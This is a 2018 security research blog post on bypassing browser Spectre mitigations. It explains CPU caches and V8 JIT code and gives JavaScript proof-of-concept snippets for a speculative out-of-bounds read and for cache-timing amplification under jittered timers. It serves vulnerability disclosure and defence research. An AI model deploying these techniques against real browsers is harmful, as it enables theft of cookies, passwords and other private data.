<--

Overcoming (some) Spectre browser mitigations

By Noam Hadad & Jonathan Afek (@JonathanAfek)
June 26, 2018

*

Spectre is a CPU vulnerability which allows an attacker in certain scenarios to read “secret” data on the victim’s machine. The vulnerability was first published by Google Project Zero and by various researchers.

One of the variants of Spectre (variant 1) is relevant in browsers executing malicious Javascript code in JIT engines. When a victim visits an attacker controlled website and malicious Javascript is served on the site, it can potentially read the all the mapped memory space of the browser process. To exploit this vulnerability the attacker code has to access “secret” memory in a speculatively executed Javascript JIT code that would have been otherwise inaccessible as it contains secret data. In a simple Javascript Spectre exploit this would be out-of-bounds index access of a Javascript array. Still, in the speculative branch, some memory (Javascript variable) has to be accessed and therefore be inserted into the CPU cache based on the “secret” value - different “secret” values will cause different variables to be inserted into the CPU cache. Then, outside the speculative branch we measure the access time to the different Javascript variables to query whether they are CPU cached or not. If we can understand which of them was in the CPU cache, we can conclude what the “secret” value was. In a browser environment, the “secret” values in the same process memory can be HttpOnly cookies, cookies of other origins, saved passwords or any other browser “secret” data or per-domain “secret” data.

Because of this vulnerability discovery, browser vendors implemented different mitigations for this vulnerability. Some of them are meant to disable known methods for querying CPU cache state of memory slots (Javascript variables). These mitigations include the resolution reduction of the Javascript timer performance.now() and adding jitter to its results.

In our research we were able to overcome the cache access timing specific mitigations. Altough these mitigations cause a serious slowdown in our POC, they are not effective in preventing this attack. These mitigations also have some negative performance implications and are hurting the functionality of some legitimate Javascript web application use-cases.

In this blog post we will first breifly talk about CPU caches in general and how they work. Then, we will briefly discuss browser Javascript JIT engines with focus on V8 and Chrome/Chromium. Next, we will show how to implement the original exploit before any Spectre specific mitigations. After that, we will introduce the known implemented Spectre mitigations in the different browsers. Next, we will show how we beat the timing specific mitigations step by step. Lastly, we will examine the implications of this research and possible further research to be done.

Here is the POC code.

CPU Cache

In this section we will focus only on the LLC L3 CPU cache for simplicity. This is good for understanding the concepts of the POC presented in this blog post. The major timing difference we expect to see in memory access time is between RAM fetches and CPU cached memory (any level of cache). Any memory that is CPU cached in any level cache is expected to also reside in the L3 LLC cache. We assume 64-bit browser processes with 48-bit addresses. We assume that the CPU uses 4KB pages and that each virtual memory address is inside a virtual memory page which is mapped to a physical memory page. This means that the lower 12 bits of the virtual address of each memory address are the same as the lower 12 bits of the physical address of that referenced memory. We assume that CPU cache is split into X different cache sets and that each of them holds an LRU list of Y cache-lines each of them is of size 64 bytes (512 bits). This means the lower 6 bits of each memory address is the offset inside the cache-line of the address.

Physical address: [b18-b47: TAG, b6-b17: Cache set index, b0-b5: Cache line offset]
                                        |
            ---------------------------------------------------------...
            |                           |                        |
            |                           |                        |
      - Cache set0 -             - Cache set1 -           - Cache set2 -
      ---- LRU -----             ----- LRU ----           ----- LRU ----
      |Cache line 0|             |Cache line 0|           |Cache line 0|
      | TAG : DATA |             | TAG : DATA |           | TAG : DATA |
      --------------             --------------           --------------
      |Cache line 1|             |Cache line 1|           |Cache line 1|
      | TAG : DATA |             | TAG : DATA |           | TAG : DATA |
      --------------             --------------           --------------
      |Cache line 2|             |Cache line 2|           |Cache line 2|
      | TAG : DATA |             | TAG : DATA |           | TAG : DATA |
      --------------             --------------           --------------
            .                          .                        .
            .                          .                        .
            .                          .                        .
            .                          .                        .

In the above graph you can see that for each physical address, the middle bits (6-17) determine the cache set the address belongs to. Whenever data at a certain address is accessed, the CPU needs to first determine whether the data is in the CPU cache or not. In order to do that the address is examined. By examining the cache set index bits (6-17, in our example) the relevant cache set is determined. Each combination of cache set index bits is mapped exclusively to a specific cache set. Each cache set is an LRU list of cache lines each holding a TAG and 512 bits of data. The TAG bits of the given address are then compared against all the TAGs currently in the cache set. If there is a match then the data in the cache line is returned to the CPU and the cache line is marked as the most recently used in the set. If there is no match then the least recently used cache line is removed from the set and the data is fetched from the RAM into a new cache line in the set and to the CPU.

The above bit ranges in the address are assumed in the POC, and we will still refer to it later in the post but it works well with even different bit ranges used for the different roles. What we do rely on is that bits 10 and 11 are part of the cache set index bits.

For more information on how CPU caches work please refer to this presentation and to Wikipedia.

Javascript engines and V8

Before getting to exploiting Spectre in a browser environment we first need to understand how Javascript engines and JIT engines work. For our research we examined V8 specifically which is Chrome’s open source Javascript engine.

V8 first compiles each Javascript function it encounters into bytecode and executes the bytecode with an interpreter. Then each time the function executes the function parameter types are recorded into the function’s feedback vector. After the function executes many times then the TurboFan JIT compiler kicks in and compiles the function code into CPU specific assembly code optimized for the input parameter types recorded in the feedback vector. The compiled function first checks that the input types are indeed of the assumed types that were recorded in the feedback vector. If not, the execution falls back to bytecode execution. If there is a match then the function continues. Each Javascript object representation holds a pointer as the first member of the object to the Hidden Class of the specific object type which defines the object’s layout. The type comparison is done by comparing this pointer to a known value for the classes recorded in the feedback vector.

Let’s take the following Javascript code for example (from the original Spectre papaer):

if (index < simpleByteArray.length) {
    index = simpleByteArray[index | 0];
    index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
    localJunk ^= probeTable[index|0]|0;
}

Which was compiled with TurboFan to:

1 cmpl r15,[rbp-0xe0]                                     ;Compare index (r15) against simpleByteArray.length
2 jnc 0x24dd099bb870                                      ;If index >= length, branch to instruction after movq below
3 REX.W leaq rsi,[r12+rdx*1]                              ;Set rsi=r12+rdx=addr of first byte in simpleByteArray
4 movzxbl rsi,[rsi+r15*1]                                 ;Read byte from address rsi+r15 (= base address+index)
5 shll rsi,12                                             ;Multiply rsi by 4096 by shifting left 12 bits}\%\
6 andl rsi,0x1ffffff                                      ;AND reassures JIT that next operation is in-bounds
7 movzxbl rsi,[rsi+r8*1]                                  ;Read from probeTable
8 xorl rsi,rdi                                            ;XOR the read result onto localJunk
9 REX.W movq rdi,rsi                                      ;Copy localJunk into rdi

In this case, for a successful attack, [rbp-0xe0] - (simpleByteArray.length) should be not in the CPU cache so that the condition of the conditional jump at line 2 could not be determined right away and the CPU would have to guess the result (speculative execution). The attack code was designed to execute the code above in a function and execute the function many times with an index which is in-bounds of the array. That way, when the code passes a large out-of-bounds index, the speculative execution guesses it is actually in-bounds. At line 4, the code reads an out-of-bounds value from simpleByteArray[index] into an index inside the speculatively falsely executed branch, and then in that same branch it reads from probeTable[index]. After a while the CPU fetches simpleByteArray.length from RAM, understands it falsely executed the branch because index is out-of-bounds and doesn’t commit any of the operations performed in the branch. One effect of the branch execution that the CPU can’t reverse is the CPU cache state. If probeTable was completely out of the CPU cache beforehand, after executing this function only the slot probeTable[index] should be in the CPU cache. Using the code below, we can query the cache state of all the probeTable slots and understand which one of them was cached and therefore conclude what index was inside the speculatively executed branch which is an out-of-bounds memory location from simpleByteArray.

for (var i = 0; i < PROBE_TABLE_SIZE; i += TABLE1_STRIDE) {
    var before = performance.now();
    tmp += probeTable[i]; //add to a global var
    var after = performance.now();
    if (after - before < CACHE_HIT_THRESHOLD) {
        return i; //This is the index from the speculative execution before
    }
}

Using different out-of-bounds indices iteratively, the whole browser process memory could be read and the attacker could get sensitive information saved in that process, such as cookies for other domains, saved passwords and any other user data saved in the process memory.

It should be noted that other techniques for timing the probeTable access existed before Browsers implemented the Spectre mitigations, some of them more accurate than using performance.now(). Here is a good overview of such techniques.

For a full implementation of the Javascript Spectre attack for unpatched browsers please see here.

Spectre browser mitigations

All the major browser vendors implemented Spectre mitigations to prevent this attack.

V8 mitigations relevant for Chrome and Chromium.

Chrome mitigations relevant for Chrome.

Chromium mitigations relevant for Chromium.

Firefox mitigations relevant for Firefox.

Microsoft mitigations relevant for Internet Explorer and Microsoft Edge.

Webkit mitigations relevant for Safari.

The main relevant mitigations are:

  1. Index masking of array objects data access. This means that before using the supplied index to access an array-like object, the index is AND’d with a mask that is based on the length of the array. The CPU does not guess the output of AND operations before it has both sides so no speculation could be done on the mask and all reads should in-bounds with this mitigation. We should note that the mask is for the next power of 2 above the array length in most implementations, so small out-of-bounds access might still be possible, albeit very challenging. If the mask is already retrieved from RAM then most probably the array length is already in the CPU cache, as they are usually very close (could be on the same cache-line). In addition, the RAM fetch request for the length was probably initiated first, so would probably complete first and the speculative execution would terminate before the actual array access.

  2. Site-Isolation for resources per domain in separate processes. That means that Javascript code running in the context of domain X will not have the cookies of domain Y in the same memory space.

  3. Disabling support for SharedArrayBuffer that can be used to implement high precision timers to time data access and query whether it was CPU cached or not.

  4. Reducing resolution of response of performance.now(), so that it would be hard to use it for timing data access given the very fast CPU cache and/or RAM access times.

  5. Adding jitter to the response of performance.now() so it would be even harder to time data access. It should be noted that where implemented, it still needs to keep the following properties: if t1 > t2 then performance.now()[t1] >= performance.now()[t2] and also if current time is exactly t1 then \|performance.now()[t1] - t1\| <= fixed-small-max-jitter-value.

The exact performance.now() implementation for Chromium including lower resolution and jitter can be seen here trough the functions “Performance::now()”, “Performance::MonotonicTimeToDOMHighResTimeStamp()” and “TimeClamper::ClampTimeResolution()” in here.

Overcoming the index masking mitigation

This mitigation prevents us from accessing out-of-bounds data from speculative execution branches using out-of-bounds indices for array-like objects.

Let’s consider another approach with the following Javascript code:

var probeBuf = new ArrayBuffer(256);
var probeArr = new Uint8Array(probeBuf);

function spectre(obj) {
        var index = obj.m53 % 256;
        probeArr[index] = 100;
}

function LargeClass() {
    this.m1 = 1;
    this.m2 = 1;
    this.m3 = 1;
    this.m4 = 1;
    this.m5 = 1;
    this.m6 = 1;
    this.m7 = 1;
    this.m8 = 1;
    this.m9 = 1;
    this.m10 = 1;
    this.m11 = 1;
    this.m12 = 1;
    this.m13 = 1;
    this.m14 = 1;
    this.m15 = 1;
    this.m16 = 1;
    this.m17 = 1;
    this.m18 = 1;
    this.m19 = 1;
    this.m20 = 1;
    this.m21 = 1;
    this.m22 = 1;
    this.m23 = 1;
    this.m24 = 1;
    this.m25 = 1;
    this.m26 = 1;
    this.m27 = 1;
    this.m28 = 1;
    this.m29 = 1;
    this.m30 = 1;
    this.m31 = 1;
    this.m32 = 1;
    this.m33 = 1;
    this.m34 = 1;
    this.m35 = 1;
    this.m36 = 1;
    this.m37 = 1;
    this.m38 = 1;
    this.m39 = 1;
    this.m40 = 1;
    this.m41 = 1;
    this.m42 = 1;
    this.m43 = 1;
    this.m44 = 1;
    this.m45 = 1;
    this.m46 = 1;
    this.m47 = 1;
    this.m48 = 1;
    this.m49 = 1;
    this.m50 = 1;
    this.m51 = 1;
    this.m52 = 1;
    this.m53 = 1;
}

function SmallClass() {
    this.m1 = 1;
    this.m2 = 1;
    this.m3 = 1;
    this.m4 = 1;
    this.m53 = 1;
}

var largeObj = new LargeClass();
var smallObj = new SmallClass();

for (var i = 0; i < 4000000; i++) {
    spectre(largeObj);
}

spectre(smallObj); // Will speculatively treat the object as LargeClass at first

for (var i = 0; i < 256; i++) {
    var before = performance.now();
    probeArr[i] = 100;
    var after = performance.now();
    if (after - before < 200) {
        //None of the probeArray slots are in the cache from before since it was never accessed in the code.
        //The first slot that is detected to be in the CPU cache because of the fast access time is
        //then used to determine the value of the byte at offest 0x1bb from the beginning of input object of the spectre() function.
        //The slot is referenced inside the function spectre() in a speculatively executed branch and by the fast
        //access time we can conclude the slot that is in the CPU cache and therefore the "secret" data that was used to
        //set the slot index inside the function spectre().
        //The value of the memory at offest 0x1bb from the beginning of input object to the spectre() function is the current value of i.
        //Log the result and exit the loop.
        break;
    }
}
console.log(localJunk);

TurboFan compiles the function spectre() into:


...

//fetch input param (obj) of the function to rax
0x2b40db1d21ea    6a  488b4510       REX.W movq rax,[rbp+0x10]

//make sure that param is a pointer (lower bit is 1 in V8 representation)
0x2b40db1d21ee    6e  a801           test al,0x1
0x2b40db1d21f0    70  0f8412010000   jz 0x2b40db1d2308  <+0x188>

//validate that the param is of type LargeClass (hidden class pointer compare)
0x2b40db1d21f6    76  48bbf1e5d8e86b000000 REX.W movq rbx,0x6be8d8e5f1    ;; object: 0x006be8d8e5f1 <Map(HOLEY_ELEMENTS)>
0x2b40db1d2200    80  483958ff       REX.W cmpq [rax-0x1],rbx
0x2b40db1d2204    84  0f8503010000   jnz 0x2b40db1d230d  <+0x18d> <--speculative execution here - make sure hidden class pointer is not in cache so branch speculation will continue as if it is a LargeClass object

//fetch member at offset 0x1bb from the beginning of the input object into rbx (this is the offset of m53 for LargeClass objects)
0x2b40db1d220a    8a  8b98bb010000   movl rbx,[rax+0x1bb] <--access out-of-bounds data here if obj is of type SmallClass, need to make sure offset 0x1bb from the input object is in the CPU cache, so we can continue with the result before the hidden class pointer is fetched from RAM and speculative execution is stopped

//sanity make sure that rbx (obj.m53) is indeed a 32 bit unsigned integer
0x2b40db1d2210    90  49ba0000000001000000 REX.W movq r10,0x100000000
0x2b40db1d221a    9a  4c3bd3         REX.W cmpq r10,rbx
0x2b40db1d221d    9d  7310           jnc 0x2b40db1d222f  <+0xaf>
0x2b40db1d221f    9f  48ba0000000001000000 REX.W movq rdx,0x100000000
0x2b40db1d2229    a9  e8329ae8ff     call 0x2b40db05bc60  (Abort)    ;; code: Builtin::Abort
0x2b40db1d222e    ae  cc             int3l

//make sure rbx (obj.m53) >= 0
0x2b40db1d222f    af  83fb00         cmpl rbx,0x0
0x2b40db1d2232    b2  0f8c9d000000   jl 0x2b40db1d22d5  <+0x155>

//extract only the lower byte of obj.m53 (% 256)
0x2b40db1d2238    b8  0fb6db         movzxbl rbx,rbx

//sanity make sure that rbx (obj.m53 % 256) is indeed a 32 bit unsigned integer
0x2b40db1d223b    bb  49ba0000000001000000 REX.W movq r10,0x100000000
0x2b40db1d2245    c5  4c3bd3         REX.W cmpq r10,rbx
0x2b40db1d2248    c8  7310           jnc 0x2b40db1d225a  <+0xda>
0x2b40db1d224a    ca  48ba0000000001000000 REX.W movq rdx,0x100000000
0x2b40db1d2254    d4  e8079ae8ff     call 0x2b40db05bc60  (Abort)    ;; code: Builtin::Abort
0x2b40db1d2259    d9  cc             int3l

//make sure rbx (obj.m53 % 256) is lower than 256 as it will be used as an index for an array of that size
0x2b40db1d225a    da  81fb00010000   cmpl rbx,0x100
0x2b40db1d2260    e0  0f83ac000000   jnc 0x2b40db1d2312  <+0x192>

...

//move (obj.m53 % 256) to rax
0x2b40db1d227a    fa  8bc3           movl rax,rbx

//sanity make sure that rax (obj.m53 % 256) is indeed a 32 bit unsigned integer
0x2b40db1d227c    fc  49ba0000000001000000 REX.W movq r10,0x100000000
0x2b40db1d2286   106  4c3bd0         REX.W cmpq r10,rax
0x2b40db1d2289   109  7310           jnc 0x2b40db1d229b  <+0x11b>
0x2b40db1d228b   10b  48ba0000000001000000 REX.W movq rdx,0x100000000
0x2b40db1d2295   115  e8c699e8ff     call 0x2b40db05bc60  (Abort)    ;; code: Builtin::Abort
0x2b40db1d229a   11a  cc             int3l

//move the probeArr object pointer to rbx
0x2b40db1d229b   11b  48bb700f05aa54560000 REX.W movq rbx,0x5654aa050f70

//assign 100 to probeArr[obj.m53 % 256]
0x2b40db1d22a5   125  c6041864       movb [rax+rbx*1],0x64 <--this inserts the relevant entry of probeArr into the CPU cache based on the secret value inside the speculative execution, so we can query the probeArr later to see which entry is in the CPU cache

...

In this code we have the function spectre() which we call many times. It receives a single parameter and since we always call it with an object of type LargeClass then it gets logged in the function’s feedback vector and TurboFan then compiles the function for handling this type specifically.

In the beginning of the function, the parameter’s hidden class pointer (parameter type) is compared against the known fixed static pointer of the LargeClass type hidden class. If there is a match execution continues and if not then TurboFan execution stops and an unoptimized execution of the function happens.

If the parameter hidden class pointer is not CPU cached then if we pass an object of type SmallClass then speculative execution can continue until the CPU realizes it is the wrong hidden class. Inside the speculative branch a large offset from the beginning of the object is queried (out-of-bounds for objects of type SmallClass).

This out-of-bounds data is then used as an index for the probe array and the Spectre exploit continues to timing accesses to the different probe array slots to understand which one is in the CPU cache.

This approach might not get us very far from the object since from a certain object size the layout of the object is different in the memory and this method is no longer applicable. Saying that, it is still an out-of-bounds memory read.

Another note is that before executing the spectre() function we must make sure that the hidden class pointer of the object passed to the function is not cached so that speculative execution will start, that the secret data queried is CPU cached (for example loading a new resource from a domain so the cookie would be loaded into the CPU cache) so that execution could continue to accessing the probe array before the speculative execution terminates, and that the probe array is all out of CPU cache so that only one entry will be in the CPU cache after the function call.

In a real exploit the probe array slots that are used will be further apart to prevent cache pre-fetching effects to insert multiple slots into the CPU cache at once.

This code is not presented in the POC code since it is harder to show the result with this technique, as Javascript doesn’t allow access to the secret data, and it’s impossible to compare it with the results we got from the Spectre exploit. The success of the exploit can be manually examined by attaching a debugger to the process right after executing the exploit and dumping the process memory.

A few notes about the Site-isolation mitigation

This mitigation is very effective, but potentially very challenging to implement correctly: it can have performance and functionality issues, and developers must actively maintain different data types in the correct process.

Another issue is that per-domain data that is not meant to be accessed by Javascript, such as HttpOnly cookies, still has the potential of being exposed.

Overcoming the data timing mitigations with a low resolution and jittered timer

The following techniques explained here are implemented in our POC.

We also implemented a very precise timer for Chromium to debug our code with. The patch for this timer is also available here.

Here we will focus on how to detect cache effects from speculative branches with low resolution and jittered timers.

Let’s consider the following code:

lastTick = performance.now();
while  (lastTick == (curTick = performance.now()));

The code above executes a busy loop until exactly the time in which we hit a new tick in performance.now(). (performance.now() returns the same time exactly between low resolution jittered ticks)

Now let’s add to it some code that executes exactly when the clock ticked:

lastTick = performance.now();
while (lastTick == (curTick = performance.now()));

for (var i = 0; i < ITER_COUNT; i++) {
    globalVar++;
}

globalVar = probeArr[index];

if (performance.now() == curTick) {
    //The access to probeArr[index] is a cache hit
} else {
    //The access to probeArr[index] is a cache miss
}

If we had no jitter and performance.now() was a small constant time execution function, we could compute the time it takes to execute globalVar++ for a specific processor. Then, we would ajust the value of ITER_COUNT so that the next performance.now() after the probeArr[index] access will get us to the next tick if we have a cache miss, and keep us in the current tick for a cache hit.

time:
--------------------------------------------------------------------------
|                            |                           |
|                            |            |--------------|--------------|
|                            |            |-----------|  |              |
|                            |            |probeArr   |  |probeArr      |
|                            |            |access     |  |access        |
|                  |---------|------------|cache      |  |cache         |
|                  |wait for |ITER_COUNT  |hit        |  |miss          |
|                  |tick     |busy loop   |           |  |              |
--------------------------------------------------------------------------
tick                  |    tick                       | tick            |
             performance.now()              performance.now()    performance.now()

This method works fine if performance.now() executes in a constant time and there is no jitter - but that isn’t the case with the current Spectre mitigations. To overcome this, we can first change the size of the probe array to have only 2 slots, one for bit value 0 and one for bit value 1, and query the out-of-bounds data bit after bit. We can then query the probe array for each secret bit multiple times, so that on average we get the true result for that bit.

This method could take an unreasonable amount of time to execute for each bit, due to performance.now() execution time overhead and timer jitter noise.

To solve this, we needed an approach which amplifies the cache miss/hit difference. To do that we wanted to have many cache misses or hits for each queried bit. We wanted to have many probe array slots for each queried bit cached or uncached. This can be achived by executing the speculative execution function for each bit multiple times and each time inserting a new slot of the probe array to the CPU cache. Then to retrieve the secret bit we can execute code such as the following:

lastTick = performance.now();
while (lastTick == (curTick = performance.now())); lastTick = curTick;

for (var i = 0; i < SLOT_COUNT; i++) {
    globalVar += probeArrBitValueZero[i];
}

var zeroCount = 0;

while (performance.now() == curTick) {
    zeroCount++;
}

lastTick = performance.now();
while (lastTick == (curTick = performance.now())); lastTick = curTick;

for (var i = 0; i < SLOT_COUNT; i++) {
    globalVar += probeArrBitValueOne[i];
}

var oneCount = 0;

while (performance.now() == curTick) {
    oneCount++;
}

if (oneCount > zeroCount) {
    //probeArrBitValueOne slots were cached and accessed faster so the count is higher and the secret bit value is 1
} else {
    //probeArrBitValueZero slots were cached and accessed faster so the count is higher and the secret bit value is 0
}

This code didn’t provide the wanted results as the memory fetches for the probe array were executed out of order and at the same time by the CPU, so we didn’t get the wanted amplification. To overcome this, we assigned each slot in the probe arrays with the index of the next slot such as this:

for (var i = 0; i < SLOT_COUNT; i++) {
    probeArrBitValueZero[i] = i + 1;
}
for (var i = 0; i < SLOT_COUNT; i++) {
    probeArrBitValueOne[i] = i + 1;
}

The query code was changed to:

lastTick = performance.now();
while (lastTick == (curTick = performance.now())); lastTick = curTick;

var index = 0;

for (var i = 0; i < SLOT_COUNT; i++) {
    // Iterations are ensured to perform in order, not simultaneously,
    // since each iteration depends on the result of the previous one.
    index = probeArrBitValueZero[index];
}
globalVar += index;

var zeroCount = 0;

while (performance.now() == curTick) {
    zeroCount++;
}

lastTick = performance.now();
while (lastTick == (curTick = performance.now())); lastTick = curTick;

index = 0;
for (var i = 0; i < SLOT_COUNT; i++) {
    // Iterations are ensured to perform in order, not simultaneously,
    // since each iteration depends on the result of the previous one.
    index = probeArrBitValueOne[index];
}
globalVar += index;

var oneCount = 0;

while (performance.now() == curTick) {
    oneCount++;
}

if (oneCount > zeroCount) {
    //probeArrBitValueOne slots were cached and accessed faster so the count is higher and the secret bit value is 1
} else {
    //probeArrBitValueZero slots were cached and accessed faster so the count is higher and the secret bit value is 0
}

This way, out of order fetches are not possible as the CPU can’t know the next address to be fetched before completing the previous fetch.

Using this approach together with performing the test multiple times for each bit and taking the average as the final result, we were able to read secret bits successfully.

To implement this approach, we had to make sure that different probe arrays for bit value 1 and bit value 0 were not using the same cache sets, and that accessing each slot would not prefetch any other slots. To achieve this, we used a single large array, and used different indices inside it to implement sub-arrays. Each slot was a page apart from the previous slot - to prevent pre-fetches and to make sure it is not in the same cache-set (different values for bits 13 and above). The beginning of a new sub array is at an offset of 1/4 page from the end of the last page of the last slot of the previous sub array. This way we ensured that the slots of each sub-array have different 10-11 address bits so they use different cache-sets.

Main Array:
-----------------------------------------------------------------------
|Sub-array0                   |1024 Bytes|Sub-array1                   |
|-------------------------    |(1/4 Page)|-------------------------    |
|       Page0|      Page1|    |          |       Page0|      Page1|    |
|------      |------     |    |          |------      |------     |    |
|Slot0|      |Slot1|     |... |          |Slot0|      |Slot1|     |... |
-----------------------------------------------------------------------  ...

To flush the cache before each test for the 2 probe sub arrays, we used another, much larger sub-array, and accessed it at indices with the same address values for bits 10-12 of the slots of the 2 probe arrays slots. We constructed it such that if the main array was present in a contiguous, non-fragmented physical memory space, then these accessed slots would use the same cache-sets as the probe arrays slots.

Implications

In this presented research we were able to show that even with the implemented Spectre mitigations, we were able to:

  1. Read speculatively accessed memory in Chrome at around 1 bit per second.

  2. Read accessed memory in Edge (not speculatively accessed) at around 1 bit per second.

  3. Read accessed memory in Safari (not speculatively accessed) at around 1 bit per second.

We were not able use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The techinque presented here is potentially relevant even for this timer resolution, but some parameter tweaking is required.

This is not a full exploit, but a POC of overcoming some of the browsers’ Spectre mitigations.

We didn’t implement the technique for accessing out-of-bounds data, that works with the index masking mitigations in the POC. However, it should work using code similar to what was presented in this post.

Microsoft did not publish the index masking mitigation in its mitigations page, which might mean that this could be used in Edge to access any memory address in the browser address space, and have arbitrary read access to any such address.

Further research

This read bandwidth could potentially be improved by tweaking the code and parameters. Other, better methods for accessing out-of-bounds data that work with the Spectre mitigations in place, could improve the effectiveness of this POC.

Conclusions

This research shows that while the timing mitigations implemented in different browsers are effective at dramatically slowing down Spectre-like attacks, they are not effective at preventing them. This means that more robust solutions are required, such as site-isolation and index masking. These timing mitigations are hurting performance and functionality for some web applications, and taking into account their limited effectiveness, reverting them should be considered.